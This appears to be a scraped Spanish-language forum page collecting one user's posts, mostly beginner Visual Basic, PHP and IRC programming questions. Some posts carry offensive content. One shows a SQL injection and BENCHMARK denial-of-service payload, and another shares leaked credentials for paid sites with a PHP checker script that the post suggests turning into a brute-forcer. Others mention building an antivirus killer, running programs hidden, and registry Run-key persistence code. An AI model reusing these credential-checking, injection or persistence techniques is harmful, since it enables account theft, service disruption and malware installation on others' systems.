Temas

Hola. Siempre uso la función mysql_real_escape_string() de PHP para evitar inyecciones sql, entonces la uso en todas las variables $_GET y $_POST.
Me acabo de dar cuenta de que esta función permite inyección de código que no tiene comillas simples no dobles, por ejemplo:
http://ejemplo.com/index.php?id=%274
El "%274"  vale lo mismo que la comilla simple, entonces ya se puede inyectar sql en mi web!
También vi que se puede inyectar código poniendo una inyección sin comillas por ejemplo:
http://ejemplo.com/index.php?id=4 AND BENCHMARK(99999999,MD5(0x123123));
con "AND BENCHMARK(99999999,MD5(0x123123));" se genera un DoS en mi servidor, porque consume mucho procesador.
¿Existe una forma de que se limpien absolutamente todo tipo de inyección? Es decir, que no sea tan mala como mysql_real_escape_string que permite inyectar lo que mostré de ejemplo.
Muchas gracias de antemano

Hola. Me cruzé con un listado de 600 URL's con acceso a webs XXX pagas
Ejemplo de las URL's que tengo:

Código [Seleccionar] Expandir

http://qlysp1oon:B4k71D8gj2@dominio.com/members/
Esa webs está protegida con autentificación básica del protocolo HTTP.
El usuario es "qlysp1oon" y la pass es "B4k71D8gj2", lo que está después de la "@" es la URL a la que se accederá si colocamos la pass correcta.
El problema es que en este listado hay muchas contraseñas que son incorrectas, entonces con un simple script en PHP podemos probar cada URL para saber si funciona

<?php
$a=fopen("NOMBRE DEL ARCHIVO QUE CONTIENE URL'S", "r");
$c="";
while(!feof($a)){
   $c.=fread($a, 1024);
}
fclose($a);

$urls=explode("\r\n", $c);
foreach($urls as $url){
   if(@fopen($url, "r")){
      echo "Esta URL es correcta: $url\n";
   }
}
?>

Debes poner el archivo de texto con las URLS en le mismo directorio que el script y escribir el nombre del listado en la primer línea, en donde se indica.
Nos mostrará cada URL que es correcta.
Modificando un poquito el code podemos hacer un crackeador de fuerza bruta o también muchas otras cosas útiles

Saludos!

Hola, tengo un texbox en un programa, es algo como un cliente de IRC, y a medida que me llegan los datos yo los pongo en un textbox, pero tengo que andar bajando el scrollbar a cada rato.
El textbox queda así:

y yo quiero que automáticamente baje quedando así:

¿Hay alguna forma de hacer esto?
Saludetes!

hola, necesito usar un array de winsock, pero estoy usando la api, y no puedo crearla... ¿Cómo se podría hacer?
Saludetes

Hola, quiero experimentar con bases de datos, entonces me instalé un servidor de mysql, para administrarla me bajé el famoso phpMyAdmin, pero no sé como usarlo...
Supongamos que quiero guardar datos de personas, por ejemplo: nombre, mail y telefono. Necesitaría esos 3 campos... Pero no sé cómo crearlos... Primero cree una base de datos, luego una tabla, y luego los 3 campos, pero no sé cómo ingresar los datos que tengo.
Espero haberme expresado bien
japi 2007!
Saludetes

Hola, tengo este problemilla... tengo un textbox con algunas palabras y necesito sacar las palabras repetidas.
hice este code:

Código [Seleccionar] Expandir


Dim a, b As Integer
dim url() as string
url() = Split(Text2.Text, vbCrLf)

For a = 0 To UBound(url)
For b = 1 To UBound(url)
If url(a) = url(b) Then
MsgBox "palabra repetida: " & url(a)
End If
Next b
Next a

por ejemplo en el textbox tengo esto:
linux
windows
windows
unix
windows
rojo
blanco
rojo
y me debería decir que palabras están repetidas... pero me dice cualquier cosa...
¿Cuál puede ser el problema?
ah, y otra cosa, como puedo hacer para sacar el texto repetido?
saludos

Hola, estoy programando un kill av (en vb), necesito obtener la ruta "C:\archivos de programa". Busqué en google y en el api-guide y no encontré ninguna api para obtener esta ruta... Entonces lo que hago es:

Código [Seleccionar] Expandir


shell "echo %programfiles% > c:\archivo.txt"

luego leo c:\archivo.txt  y ahí tengo la ruta de la preciada carpeta... Yo tengo windows xp professional y me pone 3 caracteres adelante de la carpeta (por ejemplo escribe esto: "c:\archivos de programa   ", sin las comillas) y se los saco porque no sirven. Quiero saber si alguno de ustedes que tenga otra versión de windows cómo es que lo escribe la shell, osea, si le pone 3 caracteres inútiles al final de la ruta o que otra cosa... O si por casualidad saben alguna api para obtener la ruta
Saludos y gracias
pd: creo que este tema iba en virus y troyanos... perdón si me equivoqué

Hola, estoy haciendo un par de formularios en PHP y tengo que saber cuántos caracteres tiene una variable (por ejemplo para que no me pongan un mail de 500 caracteres )
¿Hay alguna función que haga esto?
Salud0s

Hola, estoy haciendo un programa para generar listas de números. Por ejemplo: desde el 0001 hasta el 9999. Claro, muy fácil, con un bucle for se podría hacer, pero yo necesito que me ponga los ceros adelante. Poque si hago esto:

Código [Seleccionar] Expandir


dim i as long
i=0001

la variable i va a tener el valor 1 y yo quiero que tenga el valor 0001 ¿Cómo se podría hacer esto?
Espero que se alla entendido... Gracias a quién pueda ayudarme
saludetes

Hola, siempre necesite saber esto ¿es posible sacar datos de una variable? por ejemplo en una variable tengo: "sopapeame la papirola" y yo quiero sacar la palabra "papirola" ¿como hago?
graxias de antemano

Hola, hace unos días me puse a leer el protocolo irc y se me ocurrio hacer un lindo bot en visual basic. Tiene bastantes opciones... aunque creo que algunas no sirven... Le iba a agregar una opcion para cambiar de nick cada determinado tiempo... pero me parece que esa opcion no serviria mucho, es muy facil programarla =D
Le puse una opcion que es para entrar a los primeros canales... yo queria que entre a todos los canales, pero al entrar a todos los canales muy rapido el server te echa por flood... por lo que habria que poner un timer y hacer que entre a los canales uno por uno...pero en fin... modifiquenlo segun como lo quieran =) o mejor aún pueden hacer el suyo desde cero, es muy facil nada mas hay que conocer el protocolo del irc
seguro que ustedes lo pueden modificar para que quede mejor, acepto cualquier critica constructiva. por favor diganme si tengo errores
http://usuarios.lycos.es/invitacionesgmail/irc-bot-88.html
saludos
pd: aca pongo unos screenshots:

Hola, necesito saber si hay alguna funcion en vb que me permita saber la cantidad de elementos que tiene un array, existe alguna?
gracias de antemano

Hola, estoy haciendo un simple cliente de telnet.
me conecto por ejemplo a ftp.microsoft.com por el puerto 21
y solamente recivo el mensaje de biembenida, luego envío datos y no me responde (o no se muestran en el textbox correspondiente)
si quieren bajarse el proyecto para ver mejor el problema lo subi aqui:
http://usuarios.lycos.es/antivirusses/cliente_telnet.zip
gracias de antemano a quien me de una mano xD
saludos

Hola, lo que quiero hacer es esto ejecutar algo pero que no se vea.
probe con:

Código [Seleccionar] Expandir


shell= "c:\jojo.exe", vbhide

pero no me funciona para todas las cosas, me funciona nada mas para los programas de windows (shell, ie, notepad, etc...).
¿alguna forma de hacer lo mismo pero que funcione con todos los proceso?

gracias de antemano

Hola, tengo este problema, necesito que el intervalo de un timer sea el contenido de un textbox... pero me tira error diciendome que no coinciden los tipos... pense que podria ser la propiedad DataFormat del textbox y se la cambie a number y sigue el mismo error...¿es posible hacer lo que quiero con un textbox?
gracias de antemano

Hola, una pregunta media tonta...necesito cambiarle el nombre a un winsock...intente asi:
winsock1.name="tcpServer"
el error que me tira es:

entonces me dije en las propiedades (con el boton derecho) y no aparece la propiedad name   
¿es posible cambiarle el nombre?
gracias de antemano

hola, el problema que tengo es este, tengo un formulario con unos botones, pero los botones tienen el "borde"...¿cómo puedo hacer para que no aparezca?
aca dejo una imagen por si no entendieron bien...
http://img123.imageshack.us/img123/1904/boton1fs.png
saludos

hola, hace un tiempito que me trabe en esta mision  (aclaro que lo tengo en la pc) ...llego hasta el lugar donde están todos reunidos, me pone las flechas abajo yo las preciono (preciono las teclas q estan al lado del teclado  numerico) y no hago ni un misero punto !!! siendo que me voy al boliche y todo bien !!! hasta en la mision de la playa q hay q bailar con el dj me sale bien !!!!
es q estoy apretando otras teclas??? o cuando hay q apretar las teclas???
gracias a quien pueda ayudarme

esoty haciendo un juego muy simple, cundo lo quiero compilar me salta este error: "invalid outside procedure"
el codigo que pongo es este:

Option Explicit
Dim vidas As Byte
vidas = 3

Private Sub Picture1_Click()
Picture1.Picture = LoadPicture(App.Path & _
"\1.gif")
End Sub

Private Sub Picture10_Click()
Picture10.Picture = LoadPicture(App.Path & _
"\3.gif")
End Sub

Private Sub Picture11_Click()
Picture11.Picture = LoadPicture(App.Path & _
"\2.gif")
End Sub

Private Sub Picture12_Click()
If vidas = 1 Then
MsgBox "Fin del juego", "No te quedan más vidas haz perdido"
Else
vidas -1
MsgBox "Mal!", "Perdiste una vidas, ahora tienes" & vidas
End If
Picture12.Picture = LoadPicture(App.Path & _
"\m1.gif")
End Sub

Private Sub Picture13_Click()
If vidas = 1 Then
MsgBox "Fin del juego", "No te quedan más vidas haz perdido"
Else
vidas -1
MsgBox "Mal!", "Perdiste una vidas, ahora tienes" & vidas
End If
Picture13.Picture = LoadPicture(App.Path & _
"\m2.gif")
End Sub

Private Sub Picture14_Click()
Picture14.Picture = LoadPicture(App.Path & _
"\5.gif")
End Sub

Private Sub Picture15_Click()
Picture15.Picture = LoadPicture(App.Path & _
"\4.gif")
End Sub

Private Sub Picture2_Click()
Picture2.Picture = LoadPicture(App.Path & _
"\6.gif")
End Sub

Private Sub Picture3_Click()
If vidas = 1 Then
MsgBox "Fin del juego", "No te quedan más vidas haz perdido"
Else
vidas -1
MsgBox "Mal!", "Perdiste una vidas, ahora tienes" & vidas
End If
Picture3.Picture = LoadPicture(App.Path & _
"\m3.gif")
End Sub

Private Sub Picture4_Click()
Picture4.Picture = LoadPicture(App.Path & _
"\7.gif")
End Sub

Private Sub Picture5_Click()
If vidas = 1 Then
MsgBox "Fin del juego", "No te quedan más vidas haz perdido"
Else
vidas -1
MsgBox "Mal!", "Perdiste una vidas, ahora tienes" & vidas
End If
Picture5.Picture = LoadPicture(App.Path & _
"\m4.gif")
End Sub

Private Sub Picture6_Click()
Picture6.Picture = LoadPicture(App.Path & _
"\9.gif")
End Sub

Private Sub Picture7_Click()
Picture7.Picture = LoadPicture(App.Path & _
"\8.gif")
End Sub

Private Sub Picture8_Click()
If vidas = 1 Then
MsgBox "Fin del juego", "No te quedan más vidas haz perdido"
Else
vidas -1
MsgBox "Mal!", "Perdiste una vidas, ahora tienes" & vidas
End If
Picture8.Picture = LoadPicture(App.Path & _
"\m5.gif")
End Sub

Private Sub Picture9_Click()
Picture9.Picture = LoadPicture(App.Path & _
"\10.gif")
End Sub

agradezco a quien me pueda dar una mano
saludos

hola, encontre  algunos codigos de vb... y este que es para cambiar el fondo de pantalla me salta error...:

Private Declare Function SystemParametersInfo Lib "user32" Alias
"SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As
Long, ByVal lpvParam As Any, ByVal fuWinIni As Long) As Long

Private Sub Form_Load()
Dim fallo As Integer
fallo = SystemParametersInfo(20, 0, "C:\WINDOWS\FONDO.BMP", 0)
End Sub

el error me lo marca en lo que está antes de private sub form_load()...me lo marca en rojo... yo pense que tenia que ponerlo en un modulo pero no va...
gracias de antemano

hola, lo qe yo quero hacer es esto:
si existe una clave llamada "a"
msgbox "la clave existe "
si no existe
crearla

asi de simple, entonces el codigo que lke pongo e este:

On Error Resume Next
dim zonavirus
dim x
Set a = CreateObject("WScript.Shell")
X = a.regRead ("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\funka")
If X = "c:\funka" Then
MsgBox "en esta pece ya se ejecuto el programa"
Else
crearclave
End If

private sub crearclave ()
Dim regedit As Object
Set regedit = CreateObject("Wscript.Shell")
regedit.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\funka", "c:\funka", "REG_SZ"
end sub

¿Qué es lo que tengo mal en el código?
lo ejecuto y me dice que no se puede leer la primera clave que puse...
gracias de antemano

hola, necesito que mi programa cree un vbscript, pero si pongo los caracteresd del vbs me obiamente me salta error, me dijeron que tenia uqe usar caracteres de escape...pero los busque en gooooooooogle, pero no los encontré  :'(  si alguno es tan amable de pasármelos, se lo agradecería.
chau, gracias, y que siga creciendo esta gran comunidad

como puedo hacer para que no se muestre mi e-mail en el perfil?
me fije en la apariencia y todo eso pero no lo encontre...

hola, tengo un problema, no puedo poner mi a plicacion al inicio...
el codigo que pongo es es:


Set zonavirus = CreateObject("WScript.Shell")
zonavirus.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ejemplo",
"C:\perro.txt"

me parece raro que no me funcione, lo saque de un manual de vbs que vi aca...busque en un codigo fuente, y era el mismo code, no me funciona...a ustedes les funciona ?
como me gusta este efecto...

hola,  necesitaba en mi aplicacion una ventana desplegable...si, de esas que hay en casi todo programa en la parte superior de la ventana ! para que quede mejor... si me dan una mano...gracias
chau, son unos capos
ya encontre la respuesta

deberian hacer mas ancha la pantalla del foro, para q no se tenga q mover la pantalla cuando estamos leyendo un topic
chau